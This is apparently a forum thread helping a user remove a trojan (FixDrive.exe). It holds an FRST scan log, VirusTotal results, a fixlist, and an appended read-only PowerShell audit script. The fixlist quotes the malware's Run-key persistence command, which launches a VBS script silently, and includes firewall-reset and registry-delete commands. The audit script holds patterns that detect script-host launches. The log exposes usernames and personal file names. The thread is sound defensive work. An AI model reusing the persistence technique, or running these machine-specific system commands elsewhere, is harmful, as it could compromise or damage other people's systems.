2016-08-21 09:53 - 2016-08-21 09:53 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-08-21 09:53 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-08-21 09:53 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-08-21 09:53 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-08-21 09:51 - 2016-08-21 09:52 - 05200384 _____ (AVAST Software) C:\Users\Administrator\Downloads\aswmbr.exe
2016-08-21 09:51 - 2016-08-21 09:52 - 02856736 _____ (MyCity) C:\Users\Administrator\Downloads\MCShield-Setup.exe
2016-08-21 09:51 - 2016-08-21 09:52 - 02396160 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
2016-08-21 09:50 - 2016-08-21 09:53 - 22851472 _____ (Malwarebytes ) C:\Users\Administrator\Downloads\mbam-setup-2.2.1.1043.exe
2016-08-21 09:45 - 2016-08-21 09:45 - 00000000 ____D C:\WINDOWS\system32\appmgmt
2016-08-21 09:30 - 2016-08-21 09:30 - 00000000 ____D C:\Users\thabas\Downloads\FixDrive2
2016-08-21 09:30 - 2016-08-21 09:30 - 00000000 ____D C:\Users\thabas\Downloads\FixDrive
2016-08-21 09:29 - 2016-08-21 09:29 - 00008831 _____ C:\Users\thabas\Downloads\FixDrive2.rar
2016-08-21 09:29 - 2016-08-21 09:29 - 00008831 _____ C:\Users\thabas\Downloads\FixDrive.rar
2016-08-21 09:26 - 2016-08-21 09:26 - 00100504 _____ C:\Users\thabas\AppData\Local\GDIPFONTCACHEV1.DAT
2016-08-21 09:25 - 2016-08-21 09:25 - 00000000 ____D C:\Users\thabas\AppData\Local\Hewlett-Packard_Developme
2016-08-20 13:27 - 2016-08-20 13:27 - 00000000 ____D C:\Users\thabas\AppData\Roaming\SAP
2016-08-19 20:23 - 2016-08-19 20:23 - 00000000 ____D C:\Users\thabas\AppData\Local\ESET
2016-08-19 19:55 - 2016-08-19 19:55 - 00001413 _____ C:\Users\thabas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-08-19 19:55 - 2016-08-19 19:55 - 00001379 _____ C:\Users\thabas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\Roaming\vlc
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\Roaming\Synaptics
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\LocalLow\Sun
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\LocalLow\Apple Computer
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\Local\Google
2016-08-19 19:53 - 2016-08-19 19:53 - 00000000 ____D C:\Users\thabas\AppData\Roaming\CheckPoint
2016-08-19 19:52 - 2016-08-19 19:52 - 00111568 __RSH C:\Users\thabas\ntuser.pol
2016-08-19 19:51 - 2016-08-21 09:25 - 00000000 ____D C:\Users\thabas\AppData\Roaming\Hewlett-Packard
2016-08-19 19:51 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\Roaming\ICAClient
2016-08-19 19:51 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas
2016-08-19 19:51 - 2016-08-19 19:51 - 00000020 ___SH C:\Users\thabas\ntuser.ini
2016-08-19 19:51 - 2016-08-19 19:51 - 00000000 _SHDL C:\Users\thabas\My Documents
2016-08-19 19:51 - 2016-08-19 19:51 - 00000000 _SHDL C:\Users\thabas\Documents\My Videos
2016-08-19 19:51 - 2016-08-19 19:51 - 00000000 _SHDL C:\Users\thabas\Documents\My Pictures
2016-08-19 19:51 - 2016-08-19 19:51 - 00000000 _SHDL C:\Users\thabas\Documents\My Music
2016-08-19 19:51 - 2016-05-23 10:52 - 00000000 ____D C:\Users\thabas\AppData\Roaming\Sun
2016-08-19 19:51 - 2014-11-24 10:48 - 00001189 _____ C:\Users\thabas\Desktop\Show Printers - Johannesburg.lnk
2016-08-19 19:51 - 2014-11-24 10:02 - 00000000 ____D C:\Users\thabas\AppData\Roaming\hpqLog
2016-08-19 19:51 - 2014-11-24 10:01 - 00002256 _____ C:\Users\thabas\Desktop\HP Connection Manager.lnk
2016-08-19 19:51 - 2013-05-07 12:59 - 00001610 _____ C:\Users\thabas\Desktop\Snipping Tool Plus.lnk
2016-08-19 19:51 - 2012-11-20 13:57 - 00000963 _____ C:\Users\thabas\Desktop\NetWeaver Business Client 3.5.lnk
2016-08-19 19:51 - 2012-08-28 15:28 - 00001649 _____ C:\Users\thabas\Desktop\SAP Logon.lnk
2016-08-19 19:51 - 2012-03-02 08:51 - 00000675 _____ C:\Users\thabas\Desktop\Mount networkdrives.cmd
2016-08-19 19:51 - 2012-02-29 19:33 - 00001772 _____ C:\Users\thabas\Desktop\Internet Explorer.lnk
2016-08-19 19:51 - 2012-02-29 19:33 - 00001494 _____ C:\Users\thabas\Desktop\Explorer.lnk
2016-08-19 19:51 - 2012-02-29 19:21 - 00000000 ____D C:\Users\thabas\AppData\Local\ABBYY
2016-08-19 19:51 - 2012-02-29 19:18 - 00000000 ____D C:\Users\thabas\AppData\Local\Citrix
2016-08-19 19:51 - 2012-02-29 19:15 - 00000940 _____ C:\Users\thabas\Desktop\CDB Desktop 9.8.lnk
2016-08-19 19:51 - 2012-02-29 18:57 - 00001949 _____ C:\Users\thabas\Desktop\Lotus Notes 8.5 (Network).lnk
2016-08-19 19:51 - 2012-02-29 18:57 - 00001949 _____ C:\Users\thabas\Desktop\Lotus Notes 8.5 (Local).lnk
2016-08-19 19:51 - 2012-02-29 18:17 - 00002621 _____ C:\Users\thabas\Desktop\Microsoft Word 2010.lnk
2016-08-19 19:51 - 2012-02-29 18:17 - 00002621 _____ C:\Users\thabas\Desktop\Microsoft PowerPoint 2010.lnk
2016-08-19 19:51 - 2012-02-29 18:17 - 00002621 _____ C:\Users\thabas\Desktop\Microsoft Excel 2010.lnk
2016-08-19 19:51 - 2012-02-29 18:09 - 00000000 ____D C:\Users\thabas\AppData\Local\Microsoft Help
2016-08-19 19:51 - 2012-01-18 12:11 - 00000675 _____ C:\Users\thabas\Desktop\Laufwerke verbinden.cmd
2016-08-19 18:57 - 2016-08-19 18:57 - 00000000 ____D C:\Users\pietersw\AppData\Redirected
2016-08-19 18:57 - 2016-08-19 18:57 - 00000000 ____D C:\Users\pietersw
2016-08-19 13:27 - 2016-08-19 13:27 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\winsc32
2016-08-17 16:36 - 2016-08-17 16:52 - 00000000 ____D C:\Users\Administrator\AppData\Local\NPE
2016-08-17 16:36 - 2016-08-17 16:36 - 00000000 ____D C:\ProgramData\Norton
2016-08-01 15:56 - 2016-08-01 15:57 - 02432752 _____ C:\Users\ebrahimm\Downloads\Attachments_201681 (1).zip
2016-08-01 14:57 - 2016-08-01 14:57 - 04409703 _____ C:\Users\ebrahimm\Downloads\Mr M Ebrahim - August renewal 2016.pdf
2016-08-01 14:55 - 2016-08-01 14:55 - 09308687 _____ C:\Users\ebrahimm\Downloads\Attachments_201681.zip
2016-07-28 11:50 - 2016-07-28 11:50 - 00041203 _____ C:\Users\ebrahimm\Downloads\2017 admissions form (1).xlsx
2016-07-28 11:13 - 2016-06-26 02:35 - 00041704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-07-28 11:13 - 2016-06-26 02:27 - 01208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-07-28 11:13 - 2016-06-26 02:27 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-07-28 11:13 - 2016-06-26 02:27 - 00756736 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-07-28 11:13 - 2016-06-26 02:27 - 00344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.dll
2016-07-28 11:13 - 2016-06-25 21:54 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32spl.dll
2016-07-28 11:13 - 2016-06-25 21:53 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.dll
2016-07-28 11:13 - 2016-06-25 21:53 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.exe
2016-07-28 11:13 - 2016-06-25 21:41 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.exe
2016-07-28 11:13 - 2016-06-22 15:06 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-07-28 11:13 - 2016-06-14 17:03 - 03217408 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-07-27 14:45 - 2016-07-27 14:45 - 00041203 _____ C:\Users\ebrahimm\Downloads\2017 admissions form.xlsx
2016-07-26 17:01 - 2016-07-26 17:01 - 00287712 _____ C:\Users\ebrahimm\Downloads\00000005898460803382779 (5).pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-21 09:45 - 2014-11-24 16:26 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\CheckPoint
2016-08-21 09:45 - 2014-11-24 11:20 - 00000000 ____D C:\Program Files (x86)\CheckPoint
2016-08-21 09:45 - 2009-07-14 05:20 - 00000000 ____D C:\WINDOWS\inf
2016-08-21 09:43 - 2016-02-02 11:16 - 00000894 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-08-21 09:36 - 2016-02-02 11:16 - 00000898 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-08-21 08:09 - 2009-07-14 06:45 - 00019088 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-08-21 08:09 - 2009-07-14 06:45 - 00019088 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-08-21 07:52 - 2011-05-18 23:26 - 00000416 _____ C:\WINDOWS\system32\config\netlogon.ftl
2016-08-20 18:04 - 2012-02-29 19:48 - 00065557 __RSH C:\ProgramData\ntuser.pol
2016-08-20 16:25 - 2011-04-11 11:07 - 00455324 _____ C:\WINDOWS\system32\perfh011.dat
2016-08-20 16:25 - 2011-04-11 11:07 - 00146312 _____ C:\WINDOWS\system32\perfc011.dat
2016-08-20 16:25 - 2011-04-11 11:03 - 00779652 _____ C:\WINDOWS\system32\perfh007.dat
2016-08-20 16:25 - 2011-04-11 11:03 - 00178916 _____ C:\WINDOWS\system32\perfc007.dat
2016-08-20 16:25 - 2009-07-14 07:13 - 02423356 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-08-20 16:18 - 2012-02-07 15:39 - 00000000 ____D C:\TEMP
2016-08-20 16:13 - 2011-05-18 14:29 - 00000405 _____ C:\WINDOWS\SMSCFG.INI
2016-08-20 16:10 - 2009-07-14 07:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-08-19 19:17 - 2009-07-14 06:57 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-08-19 13:29 - 2014-11-24 16:37 - 00100504 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
2016-08-02 11:50 - 2014-12-09 09:31 - 00000000 ____D C:\Users\ebrahimm
2016-08-01 09:38 - 2009-07-14 06:45 - 00384128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-07-29 12:02 - 2014-12-17 14:57 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-07-29 08:40 - 2016-02-02 11:18 - 00002161 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-07-29 08:40 - 2016-02-02 11:18 - 00002149 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-07-29 08:30 - 2016-02-02 11:16 - 00003894 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-07-29 08:30 - 2016-02-02 11:16 - 00003642 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-07-28 14:14 - 2014-12-09 09:32 - 00111180 __RSH C:\Users\ebrahimm\ntuser.pol

==================== Files in the root of some directories =======

2009-02-13 16:19 - 2009-02-13 16:19 - 0737280 _____ (InfoSlips) C:\Program Files (x86)\Common Files\InfoSlips.ForMe.exe
2014-11-24 16:26 - 2014-12-09 09:35 - 0001675 _____ () C:\Users\Administrator\AppData\Local\CPAUTO.tmp

Some zero byte size files/folders:

C:\Windows\SysWOW64\dlumd10.dll
C:\Windows\SysWOW64\dlumd11.dll
C:\Windows\SysWOW64\dlumd9.dll
C:\Windows\System32\dlumd10.dll
C:\Windows\System32\dlumd11.dll
C:\Windows\System32\dlumd9.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-08-17 13:47

==================== End of FRST.txt ============================

attach the logs from FRST

I also have the virus if you would like me to copy it.
Upload and scan the file at www.virustotal.com; if it was scanned before, click Rescan for a fresh result, then post the link to the scan result here.

Hi,

Thank you for helping, the logs are more than 2000 characters so I had to split them.

That is why FRST logs should be attached.

See below the box you write in > Attachments and other options.

Virus total

Analysis

AegisLab Troj.Gen.Smh!c 20160821
Jiangmin TrojanDropper.Delf.foi 20160821
Symantec Trojan.Gen.SMH 20160821
TrendMicro-HouseCall TROJ_GEN.R08JH05HK16 20160821
ALYac 20160821
AVG 20160821
AVware 20160821
Ad-Aware 20160821
AhnLab-V3 20160820
Alibaba 20160819
Antiy-AVL 20160821
Arcabit 20160821
Avast 20160821
Avira (no cloud) 20160820
Baidu 20160820
BitDefender 20160821
Bkav 20160820
CAT-QuickHeal 20160820
CMC 20160818
ClamAV 20160821
Comodo 20160821
Cyren 20160821
DrWeb 20160821
ESET-NOD32 20160821
Emsisoft 20160821
F-Prot 20160821
F-Secure 20160821
Fortinet 20160821
GData 20160821
Ikarus 20160821
K7AntiVirus 20160821
K7GW 20160821
Kaspersky 20160821
Kingsoft 20160821
Malwarebytes 20160821
McAfee 20160821
McAfee-GW-Edition 20160820
eScan 20160821
Microsoft 20160821
NANO-Antivirus 20160821
Panda 20160821
Qihoo-360 20160821
Rising 20160821
SUPERAntiSpyware 20160821
Sophos 20160821
Tencent 20160821
TheHacker 20160817
TrendMicro 20160821
VBA32 20160819
VIPRE 20160821
ViRobot 20160820
Zillya 20160820
Zoner 20160821
nProtect None

File detail
Target machine Intel 386 or later processors and compatible processors
Compilation timestamp 1992-06-19 22:22:17
Entry Point 0x00003DFC
Number of sections 8
PE sections
Name Virtual address Virtual size Raw size Entropy MD5
CODE 4096 12064 12288 6.37 fcbc058569ca206552c654c94abf2c8d
DATA 16384 160 512 1.86 2e324267f6c61a3e82840c05968ac898
BSS 20480 1637 0 0.00 d41d8cd98f00b204e9800998ecf8427e
.idata 24576 966 1024 4.16 874f16b3120828d7117f4d58e058a5b7
.tls 28672 8 0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rdata 32768 24 512 0.20 753527920e84ff25027979eeb2bca12a
.reloc 36864 800 1024 5.62 a240c07ab41704231e2a3a303aace3ec
.rsrc 40960 16 512 0.08 ca7be63846877fa481b02c3288f88ad1
PE imports
[+] advapi32.dll
[+] kernel32.dll
[+] shell32.dll
[+] user32.dll
ExifTool file metadata
MIMEType application/octet-stream
Subsystem Windows GUI
MachineType Intel 386 or later, and compatibles
FileTypeExtension exe
TimeStamp 1992:06:19 23:22:17+01:00
FileType Win32 EXE
PEType PE32
CodeSize 12288
LinkerVersion 2.25
EntryPoint 0x3dfc
InitializedDataSize 3584
SubsystemVersion 4.0
ImageVersion 0.0
OSVersion 4.0
UninitializedDataSize 0

Additional info

MD5 c7141b586f3669c9468a4c95c0d4622e
SHA1 ce7b5c199e798af6229c26054dc7e35678e504af
SHA256 53ded0c3da41ecacb88815f781512995a1780697540966a9d9dda55f93aef392
ssdeep 384:EezzZEeyI91y8N9Q+9tlWsSkqMk+Nmgz507+k:Vc8N9PNhFAg507p
authentihash 41c71f87b005fe7541c694ea9f403b9196bc9d12a0f4520cf3baa33268e29d3b
imphash f1160d135f828ca8cb598f8b55457f6d
File size 16.5 KB ( 16896 bytes )
File type Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit
TrID Win32 Dynamic Link Library (generic) (38.3%)
Win32 Executable (generic) (26.2%)
Win16/32 Executable Delphi generic (12.0%)
Generic Win/DOS Executable (11.6%)
DOS Executable Generic (11.6%)
Tags peexe
VirusTotal metadata
First submission 2016-08-15 06:43:14 UTC ( 6 days, 2 hours ago )
Last submission 2016-08-21 09:35:32 UTC ( 5 minutes ago )
File names FixDrive.exe

FRST

As I said, post the link to the VT result.

There is lots of additional file info behind the extra tabs that we can't see when you copy and paste.

Found it using MD5 search
https://virustotal.com/en/file/53ded0c3da41ecacb88815f781512995a1780697540966a9d9dda55f93aef392/analysis/

@dbrisendine will assist you when back online.

Herewith the link

https://www.virustotal.com/en/file/53ded0c3da41ecacb88815f781512995a1780697540966a9d9dda55f93aef392/analysis/1471772132/

Is this a business machine that is part of a domain? Some of the settings may not be able to be changed except by the Domain Administrator.

FIRST >>>>

Did you know that System Restore is disabled?

If you did not do this intentionally, please check the following:

Go to Start and type System in the search box.

Click on System (under Control Panel or Settings) and then on System Protection.

Click on Configure and then select Turn on system protection.

Click Apply and then OK.

In the System Protection screen, is Protection now On for the drive?

SECOND >>>>

Please go to START (Windows Orb) >> Control Panel >> Uninstall a Program or Programs and Features and remove the following (if listed):

QuickTime

To do so, left click on the name once and then click Uninstall/Change at the bar above the list window.

Follow the prompts of the uninstaller BUT please read carefully any questions it asks before answering; some uninstallers will try and deceive you into keeping the software.

THIRD >>>>

Open Notepad by pressing the Windows Key + R Key, typing Notepad in the Run dialog and then pressing Enter. Please copy the contents of the Code box below. To do this, highlight the contents of the box by clicking [Select] next to Code:, then right click on any of the highlighted text and select Copy. Paste this into the open Notepad window. Save it to your desktop as fixlist.txt.


Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [b] => wscript.exe //B "C:\Users\ADMINI~1\AppData\Roaming\winsc32\b.vbs"
C:\Users\ADMINI~1\AppData\Roaming\winsc32
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Infoclient] => [X]
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-3459921781-3051252704-3355898513-500\...\Run: [b] => wscript.exe //B "C:\Users\ADMINI~1\AppData\Roaming\winsc32\b.vbs"
Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update Explorer.lnk [2016-08-21]
BHO-x32: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll => No File
Toolbar: HKU\S-1-5-21-3459921781-3051252704-3355898513-500 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
CHR Extension: (Google Search) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-21]
S3 e1express; system32\DRIVERS\e1e6232e.sys [X]
S3 e1yexpress; system32\DRIVERS\e1y62x64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\Windows\system32\DRIVERS\e1e6232e.sys
C:\Windows\system32\DRIVERS\e1y62x64.sys
C:\Windows\System32\drivers\rdvgkmd.sys
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end

NOTE. It’s important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST64 by right clicking on the FRST64.exe file, selecting “Run as Administrator…”. The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.

http://i1351.photobucket.com/albums/p785/dbreeze2/just%20stuff/Press%20the%20FIX%20button_zpsdd5zi3mt.png

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please attach it to your reply post. Also, tell me how your system is running now.
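A read-only audit of the persistence points the fixlist above removes, as an added example written for this page; it is not part of the thread's posts and not FRST code. It assumes the items shown in the fixlist and the FRST log (a Run value that launches wscript.exe //B with a b.vbs under a winsc32 folder, a Startup-folder shortcut, the DisableSR/DisableConfig values under the SystemRestore policy key) and that it is run from an elevated Windows PowerShell on the affected machine. It only reports what it finds and changes nothing, so it can be run before the fix to confirm the entries are present and again after the reboot to confirm they are gone.

```powershell
# Added example for this thread (not from the original posts, not FRST code).
# Read-only audit of the persistence points the fixlist targets. Run from an
# elevated Windows PowerShell. Nothing is deleted or changed.

$findings = New-Object System.Collections.Generic.List[object]

function Add-Finding([string]$Check, [string]$Location, [string]$Detail) {
    $findings.Add((New-Object PSObject -Property @{ Check = $Check; Location = $Location; Detail = $Detail }))
}

# 1. Run keys (64-bit, WOW64 and the current user's hive) whose command launches
#    a script host. The entry in the log is: wscript.exe //B "...\winsc32\b.vbs"
#    (//B is wscript's batch mode: the script runs with no visible prompt).
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }      # provider metadata, not a Run value
        if ("$($p.Value)" -match '(?i)\b[wc]script(\.exe)?\b') {
            Add-Finding 'RunKey' "$key\$($p.Name)" "$($p.Value)"
        }
    }
}

# 2. Startup-folder shortcuts (the log lists "Update Explorer.lnk"), resolved to
#    their real target so that a harmless-looking name does not hide a script host.
$shell   = New-Object -ComObject WScript.Shell
$startup = [Environment]::GetFolderPath('Startup')
Get-ChildItem -Path $startup -Filter '*.lnk' -Force -ErrorAction SilentlyContinue | ForEach-Object {
    $lnk = $shell.CreateShortcut($_.FullName)
    $cmd = "$($lnk.TargetPath) $($lnk.Arguments)"
    if ($cmd -match '(?i)\b[wc]script(\.exe)?\b|\.vbs\b') {
        Add-Finding 'StartupShortcut' $_.FullName $cmd
    }
}

# 3. The winsc32 folder named in the fixlist, checked under every user profile
#    (the fixlist only lists the Administrator profile's copy).
Get-ChildItem -Path "$env:SystemDrive\Users" -Force -ErrorAction SilentlyContinue |
  Where-Object { $_.PSIsContainer } | ForEach-Object {
    $dir = Join-Path $_.FullName 'AppData\Roaming\winsc32'
    if (Test-Path -LiteralPath $dir) {
        Add-Finding 'DropperFolder' $dir ((Get-ChildItem -Force -LiteralPath $dir -Name) -join ', ')
    }
}

# 4. The System Restore policy values the FRST log marked ATTENTION.
$srPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore'
if (Test-Path $srPolicy) {
    $sr = Get-ItemProperty -Path $srPolicy
    foreach ($name in 'DisableSR', 'DisableConfig') {
        if ($sr.$name -eq 1) { Add-Finding 'SystemRestorePolicy' "$srPolicy\$name" '1 (disabled by policy)' }
    }
}

if ($findings.Count -eq 0) { 'No findings.' } else { $findings | Format-Table Check, Location, Detail -AutoSize }
```

The Run-key check matches on the command, not on the value name, because the value name (here simply "b") is arbitrary and easily changed, while a script host being launched from a Run key is the behaviour worth noticing. HKCU is read for whichever account runs the elevated shell; to check another profile's hive, the same check can be run while logged in as that user.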